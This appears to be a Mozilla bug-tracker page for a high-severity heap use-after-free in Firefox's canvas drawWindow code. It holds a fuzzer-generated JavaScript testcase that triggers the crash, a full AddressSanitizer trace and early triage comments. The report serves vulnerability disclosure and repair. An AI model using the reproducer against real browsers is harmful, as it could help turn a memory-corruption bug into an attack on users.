Closed
Bug 1379885
Opened 7 years ago
Closed 7 years ago
heap-use-after-free in NeedToDrawShadow
Categories
(Core :: Graphics: Canvas2D, defect)
Tracking
()
People
(Reporter: nils, Unassigned)
Details
(Keywords: csectype-uaf, sec-high, Whiteboard: [fixed by bug 1371259?][adv-main56-])
Attachments
(2 files)
The following testcase crashes the latest ASAN build of Firefox release 54.0.2 (BuildID=20170629230646). The testcase requires the fuzzPriv extension.
<script>
function spin() {
var x=new XMLHttpRequest();
x.open("POST","https://mozilla.org",false);
try{x.send("X");}catch(e){}
}
function start() {
o1=window.open('data:text/html,<div>','p0','width=7');
o1.onload=fun0;
o2=window.open('data:text/html,<div>','p1','width=4023');
o2.onload=fun1;
}
function fun0 (e) {
o7=e.target;
o1.onresize=fun2;
}
function fun1() {
o54=o7.querySelector('*:not([id])');
o1.resizeTo(30,242);
document.documentElement.appendChild(o54);
spin();
o1.close();
o1.fuzzPriv.callDrawWindow(0);
}
function fun2() {
o1.onresize=function(){};
o1.resizeBy(-2,15);
spin();
o1.onresize=fun3;
o1.resizeBy(15,13);
}
function fun3() {
spin();
fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==15542==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a00029d170 at pc 0x7fdea09738fd bp 0x7ffcbaacac40 sp 0x7ffcbaacac38
READ of size 8 at 0x61a00029d170 thread T0
#0 0x7fdea09738fc in Length /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:397:37
#1 0x7fdea09738fc in CurrentState /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CanvasRenderingContext2D.h:1128
#2 0x7fdea09738fc in NeedToDrawShadow /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CanvasRenderingContext2D.h:876
#3 0x7fdea09738fc in mozilla::dom::CanvasRenderingContext2D::UsedOperation() /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CanvasRenderingContext2D.h:914
#4 0x7fdea0995d2f in mozilla::dom::CanvasRenderingContext2D::DrawWindow(nsGlobalWindow&, double, double, double, double, nsAString_internal const&, unsigned int, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:5419:22
#5 0x7fde9fcc2a00 in mozilla::dom::CanvasRenderingContext2DBinding::drawWindow(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:2308:3
#6 0x7fdea08a1677 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
#7 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#8 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#9 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#10 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
#11 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#12 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#13 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#14 0x7fdea6b75423 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#15 0x7fde9db5d399 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#16 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#17 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#18 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#19 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#20 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
#21 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
#22 0x7fdea6e01314 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
#23 0x7fdea61b2047 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#24 0x7fdea61b2047 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
#25 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#26 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
#27 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#28 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#29 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#30 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#31 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
#32 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
#33 0x7fdea6e01314 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
#34 0x7fdea61b2047 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#35 0x7fdea61b2047 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
#36 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#37 0x7fdea6b771dc in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
#38 0x7fdea02e42c4 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#39 0x7fdea0cd1bea in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#40 0x7fdea0cd1bea in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#41 0x7fdea0c9cde0 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
#42 0x7fdea0c9ed89 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
#43 0x7fdea0c89203 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
#44 0x7fdea0c8cb72 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
#45 0x7fdea2e391fc in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1058:7
#46 0x7fdea520af32 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7646:5
#47 0x7fdea5206e54 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7440:7
#48 0x7fdea520e53f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7337:13
#49 0x7fde9de0e530 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
#50 0x7fde9de0d4c8 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:5
#51 0x7fde9de0a226 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
#52 0x7fde9de0c324 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
#53 0x7fde9de0cedc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
#54 0x7fde9c66c36a in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:634:18
#55 0x7fde9ee500bb in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8840:7
#56 0x7fde9ee4fbdc in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8766:9
#57 0x7fde9ee25553 in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5296:3
#58 0x7fde9eef6592 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
#59 0x7fde9eef6592 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
#60 0x7fde9eef6592 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
#61 0x7fde9c4bec71 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#62 0x7fde9c4bb8c0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#63 0x7fde9d2a32cf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#64 0x7fde9d215cb8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#65 0x7fde9d215cb8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#66 0x7fde9d215cb8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#67 0x7fdea260eecf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#68 0x7fdea5b65571 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#69 0x7fdea5d33069 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4499:10
#70 0x7fdea5d34cd5 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4677:8
#71 0x7fdea5d3602c in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4768:16
#72 0x4dffaf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:10
#73 0x4dffaf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307
#74 0x7fdeb7d4a82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
#75 0x41c3d8 in _start (/home/nils/fuzzer3/rel/firefox/firefox+0x41c3d8)
0x61a00029d170 is located 240 bytes inside of 1168-byte region [0x61a00029d080,0x61a00029d510)
freed by thread T0 here:
#0 0x4b2b2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7fde9c35e644 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
#2 0x7fde9c35e236 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
#3 0x7fde9c36569e in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3836:3
#4 0x7fde9c364b50 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
#5 0x7fde9c3680ec in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4154:3
#6 0x7fde9ef34fdf in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1451:3
#7 0x7fde9ea9c20d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
#8 0x7fde9c4d9cb1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
#9 0x7fde9dc27e77 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
#10 0x7fde9dc27e77 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
#11 0x7fde9dc27e77 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
#12 0x7fde9dc2f42d in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
#13 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#14 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#15 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#16 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
#17 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#18 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#19 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#20 0x7fdea6b75423 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#21 0x7fde9db5d399 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#22 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#23 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#24 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#25 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
#26 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#27 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#28 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#29 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#30 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
#31 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
#32 0x7fdea6e01314 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
#33 0x7fdea61b2047 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#34 0x7fdea61b2047 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
#35 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#36 0x7fdea6b771dc in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
previously allocated by thread T0 here:
#0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x4e11bd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7fdea09a3858 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7fdea09a3858 in mozilla::dom::CanvasRenderingContextHelper::CreateContextHelper(mozilla::dom::CanvasContextType, mozilla::layers::LayersBackend) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:142
#4 0x7fdea0eaf395 in mozilla::dom::HTMLCanvasElement::CreateContext(mozilla::dom::CanvasContextType) /home/worker/workspace/build/src/dom/html/HTMLCanvasElement.cpp:420:5
#5 0x7fdea0eaf724 in non-virtual thunk to mozilla::dom::HTMLCanvasElement::CreateContext(mozilla::dom::CanvasContextType) /home/worker/workspace/build/src/dom/html/HTMLCanvasElement.cpp:416:20
#6 0x7fdea09a3f0c in mozilla::dom::CanvasRenderingContextHelper::GetContext(JSContext*, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:186:15
#7 0x7fdea0eb5f14 in mozilla::dom::HTMLCanvasElement::GetContext(JSContext*, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/HTMLCanvasElement.cpp:972:10
#8 0x7fdea055d5af in mozilla::dom::HTMLCanvasElementBinding::getContext(JSContext*, JS::Handle<JSObject*>, mozilla::dom::HTMLCanvasElement*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:242:43
#9 0x7fdea08a1677 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
#10 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#11 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#12 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#13 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
#14 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#15 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#16 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#17 0x7fdea6b75423 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#18 0x7fde9db5d399 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#19 0x7fdea61b1f9f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#20 0x7fdea61b1f9f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#21 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#22 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#23 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
#24 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
#25 0x7fdea6e01314 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
#26 0x7fdea61b2047 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#27 0x7fdea61b2047 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
#28 0x7fdea619873e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#29 0x7fdea619873e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2993
#30 0x7fdea617d952 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#31 0x7fdea61b22b6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#32 0x7fdea61b2992 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#33 0x7fdea6e1ef2c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#34 0x7fdea6dd5b5e in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
#35 0x7fdea6dfe9e9 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:397:37 in Length
Shadow bytes around the buggy address:
0x0c348004b9d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c348004b9e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c348004b9f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c348004ba00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c348004ba10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c348004ba20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd
0x0c348004ba30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c348004ba40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c348004ba50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c348004ba60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c348004ba70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==15542==ABORTING
|
||
Comment 2•7 years ago
|
||
Markus, maybe you can take a look?
Group: core-security → gfx-core-security
status-firefox54:
--- → wontfix
status-firefox55:
--- → affected
status-firefox56:
--- → affected
status-firefox-esr52:
--- → ?
tracking-firefox55:
--- → ?
tracking-firefox56:
--- → ?
tracking-firefox-esr52:
--- → ?
Flags: needinfo?(mstange)
|
||
Updated•7 years ago
|
Keywords: csectype-uaf,
sec-high
|
|
||
Updated•7 years ago
|
Flags: sec-bounty?
|
||
Comment 4•7 years ago
|
||
(In reply to Nils from comment #0) > The testcase requires the fuzzPriv extension. Where do I get this extension and what is the code that's executed by fuzzPriv.callDrawWindow(0)?
Flags: needinfo?(mstange) → needinfo?(nils)
|
||
Comment 5•7 years ago
|
||
